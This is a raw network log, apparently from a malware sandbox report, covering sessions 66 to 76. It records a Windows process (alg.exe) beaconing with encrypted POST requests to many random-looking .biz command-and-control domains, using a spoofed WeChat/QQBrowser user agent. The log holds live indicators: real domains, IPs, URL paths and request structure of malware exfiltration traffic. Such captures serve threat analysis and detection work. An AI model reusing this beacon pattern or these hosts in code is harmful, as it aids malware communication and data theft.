                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=f214832bab4336ab12c3342655e6ccc6|155.94.241.187|1731920289|1731920289|0|1|0; path=/; domain=.ifsaia.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      66192.168.2.75004547.129.31.212805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:08.847726107 CET348OUTPOST /rxjmtw HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: ftxlah.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:08.847726107 CET778OUTData Raw: 99 57 91 f7 37 10 ed 8c fe 02 00 00 79 64 60 2f d8 c5 84 34 d3 b3 6f 8c 61 e8 78 4c 14 bc a3 c2 bf 3e 95 fa 2e 88 85 6d e2 08 d4 27 7a 4c 72 c3 00 c4 2f 53 48 4e cf 27 21 83 0e 0d 79 e1 f4 b3 a9 0e 36 65 76 b7 34 3d 10 9d c9 ad 47 b6 bb 33 94 68
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: W7yd`/4oaxL>.m'zLr/SHN'!y6ev4=G3hP8r~/L?$%K">5Jgs]QC>f1]X4|a_G "N'%6!gRbm^/o8)0Kw`_Vp>>kAHi+
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:10.326430082 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:10 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=7476205b475e3191b64c5419b047b8fd|155.94.241.187|1731920290|1731920290|0|1|0; path=/; domain=.ftxlah.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                      67192.168.2.75004644.221.84.10580
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:10.290079117 CET352OUTPOST /ptgfiwe HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: saytjshyf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:10.290139914 CET842OUTData Raw: d6 c3 7c c6 b7 e6 0a 7a 3e 03 00 00 a5 da 76 7c da 18 b7 bd 41 5e b4 c3 37 12 35 f8 80 cc f7 b1 40 94 40 34 f2 b2 77 fa a8 da 9d ac 2b 05 60 ec a7 84 44 2d e2 8e ed 6b 12 6b 9f 18 48 d9 fc 89 73 03 ce 7d ee a6 19 f5 5c 70 1c 4c f7 94 3b e6 f2 c5
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: |z>v|A^75@@4w+`D-kkHs}\pL;f!>,<(#mQF+}jYby<<{L"W9f[mvq,H{inoMx)kwyC@{>_3elnhiSD$d%^2r31DT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:10.886734962 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:10 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=cad0206209c73d77d453287b6c3cff57|155.94.241.187|1731920290|1731920290|0|1|0; path=/; domain=.saytjshyf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                      68192.168.2.75004718.141.10.10780
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:11.026894093 CET355OUTPOST /jabraqcqvewg HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: vcddkls.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:11.026894093 CET842OUTData Raw: ce 98 ed 43 f5 ae 41 c2 3e 03 00 00 1e e4 54 6c 8e 52 96 23 6a 31 10 88 6b 6e 07 ae da 13 be 68 f7 5e 95 d8 16 5b 17 a6 42 0b 9c 0a 90 25 40 38 a4 86 b3 88 72 bf 6d f6 3c bf 56 b2 03 28 ef 71 98 17 02 f6 53 17 8f f2 45 fc e7 14 00 a3 db 9b 09 1e
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: CA>TlR#j1knh^[B%@8rm<V(qSE(k:<^&@[pt*tm[kd4W]\+Puz`xokkd1WNg<<~_E+GuV2doDI[|vd]^~WB>
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:12.476957083 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:12 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=78c48a91aa8e51a082eafa29822e4725|155.94.241.187|1731920292|1731920292|0|1|0; path=/; domain=.vcddkls.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      69192.168.2.75004813.251.16.150805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:11.110744953 CET347OUTPOST /ipko HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: typgfhb.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:11.110785961 CET778OUTData Raw: 31 7f 00 ae c8 fd 02 78 fe 02 00 00 b8 e1 e2 26 84 63 f4 e7 77 3f 32 4d 70 04 f5 60 bf 23 4d f9 57 01 f7 0a 8b 92 db d9 9a 14 45 1a 3d d9 ff 5e 70 f0 5c 2c e0 5e c4 21 f9 19 d5 b6 06 48 bb e1 7b 09 0d c4 d0 9d 7a 47 64 31 97 72 0b d9 9c 91 01 d9
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 1x&cw?2Mp`#MWE=^p\,^!H{zGd1r'gCG]569gpNz0FO$4.R8P`<5,Q^/D15uATQ*QYcg pYEL3%I\fP$<.w{))A%1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:12.558746099 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:12 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=4f321ecc6b77338409e948531ca936c4|155.94.241.187|1731920292|1731920292|0|1|0; path=/; domain=.typgfhb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                      70192.168.2.750049172.234.222.13880
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:12.501005888 CET353OUTPOST /jowqmtxqicfl HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: fwiwk.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:12.501075983 CET842OUTData Raw: 8b f9 91 53 e3 5c 5f 3b 3e 03 00 00 c2 e3 48 08 61 13 90 c0 52 eb 31 2c 4d 97 ac 57 3f 14 5b d6 7d cb 73 62 f8 b3 d2 da 41 9e 39 a0 ef 3f be 92 8c fe 65 4b 51 7c ca 54 f7 80 c3 a8 b7 d3 76 dd a5 dd 8d b8 0b a4 3e b0 d2 0b 02 21 5a ea 8a 4b 06 46
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: S\_;>HaR1,MW?[}sbA9?eKQ|Tv>!ZKFHgqsa7,%4{b=-{S-B~hrgpWB4waO@~|0_@,;'JP{+8Vn;WH8t+5B&n'n\m%<iyS)J


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      71192.168.2.75005034.211.97.45805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:12.969628096 CET346OUTPOST /nfkpu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: esuzf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:12.969647884 CET778OUTData Raw: ff 08 71 9c 19 1b 5a ba fe 02 00 00 67 32 0e 82 97 92 ab 27 ce 1d 3d e3 69 d9 76 02 7a 32 f1 b0 aa fe 25 c6 b8 a1 72 4b 97 7c 9f c2 92 33 89 52 a9 5d 64 16 c9 a1 80 d4 ac 75 a9 3d ab 05 59 f7 33 0c 5b 48 b7 cc 86 03 58 fd e5 61 e4 7c f7 63 a1 54
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: qZg2'=ivz2%rK|3R]du=Y3[HXa|cTPM3QW/sY6sS(1G|;awKq1a:"+Kl5F[H[X*Yn#kT{Rr <'/OUSK~(=V]-?M>mCalO6uf
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:13.826838970 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:13 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=88434270bd31afc77c04ccd91421e043|155.94.241.187|1731920293|1731920293|0|1|0; path=/; domain=.esuzf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                      72192.168.2.750051172.234.222.13880
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:13.184406996 CET352OUTPOST /fkgxppcjxls HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: fwiwk.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:13.184406996 CET842OUTData Raw: 1a 8e 3c 86 5b b0 66 92 3e 03 00 00 ee 95 34 e5 51 d2 ae d4 22 a2 00 5b 92 68 fd 7a 74 c7 d8 8e 95 f8 68 da 6c f2 93 52 b6 9a a0 e7 3a ad aa 35 a0 27 a2 7d 8f 58 28 6b bc 6b 61 74 05 e3 26 ce ff d3 ce 79 da a9 2a b7 8f c3 67 68 38 92 71 16 6d fe
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: <[f>4Q"[hzthlR:5'}X(kkat&y*gh8qm{ o$#@5'qsk(dN}U"~uLcaA<3u]BCqwDjhS;I}7C>]GwIjGiLQ|s6(nDj:SNW6?"


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                      73192.168.2.75005234.246.200.16080
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:13.869822979 CET348OUTPOST /ayxmva HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: tbjrpv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:13.869934082 CET842OUTData Raw: 15 ac b4 a3 6f 32 a4 90 3e 03 00 00 92 b7 4b 5d cf f6 b6 d7 20 22 da d1 78 34 28 b3 dd 22 6e b8 38 79 72 c6 9c f4 aa e0 a9 13 39 51 41 1d 3a 44 0e a1 58 ce 3e 43 86 e0 37 7a 51 aa 00 fa b2 d7 3c 67 a9 08 54 12 ba a5 33 a1 6a a8 9c 6d c7 75 14 1f
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: o2>K] "x4("n8yr9QA:DX>C7zQ<gT3jmuxtxvMQ.yG^!mj^TAe(D9d(_|y1A;D/0f~OSh,z-V\+GDqn$5cMh**y,`=]L T
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:14.841389894 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:14 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=f37bcc702e1685e6c60a8ce536270374|155.94.241.187|1731920294|1731920294|0|1|0; path=/; domain=.tbjrpv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      74192.168.2.7500533.94.10.34805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:14.125663042 CET361OUTPOST /eoxlhmklnxbyibsu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: gvijgjwkh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:14.125680923 CET778OUTData Raw: 3b ff 6f 57 a7 8e 83 16 fe 02 00 00 f5 3a 26 db 7b 1a f6 91 22 c0 49 c7 66 f7 6f 11 1d 44 68 f9 10 b0 a1 22 a8 ee 92 76 c6 07 a4 c6 01 b0 91 0c 4c ef 5e 3b e5 1e 9e f8 15 b4 30 f0 89 f5 09 54 12 81 0c 60 be 78 32 52 00 47 5e d4 b6 e9 95 bf 72 fd
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: ;oW:&{"IfoDh"vL^;0T`x2RG^rtX'3s|f_ILS aIGY)|#i$4Omf@NM3 Dts<gv#FF`eh&uXTozMcaw09<&Y4RD#SYI)SeVi@ks5:
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:14.799864054 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:14 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=f72ccfe20b4984754150c507fcd86def|155.94.241.187|1731920294|1731920294|0|1|0; path=/; domain=.gvijgjwkh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                      75192.168.2.75005418.208.156.24880
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:14.888737917 CET348OUTPOST /clakqqe HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: deoci.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:14.888737917 CET842OUTData Raw: 07 6c 5a ea 1c 11 05 60 3e 03 00 00 c2 61 99 1b f1 cf 9a 96 99 c8 3e 18 5d eb 1f ed f2 fc ad c2 10 99 a2 cc 94 38 c8 44 82 72 28 49 b3 8e e9 c8 1f c4 9b 17 a8 de 96 91 94 50 05 92 ee 9e d2 e2 71 8e 77 c2 43 b2 25 d7 bb 36 d6 4d b0 e1 88 13 48 34
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: lZ`>a>]8Dr(IPqwC%6MH4o[xJMQ{ m`tslBtm`9UYcA&slXf;G1o e'].l}hL*^xLvv,gw!`) ~9^^a>Ij!r^uI
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:15.579406023 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:15 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=167dca44e0d597b16c76185c93e1823c|155.94.241.187|1731920295|1731920295|0|1|0; path=/; domain=.deoci.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      76192.168.2.75005518.246.231.120805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:15.047622919 CET350OUTPOST /wlytwhn HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: qpnczch.biz
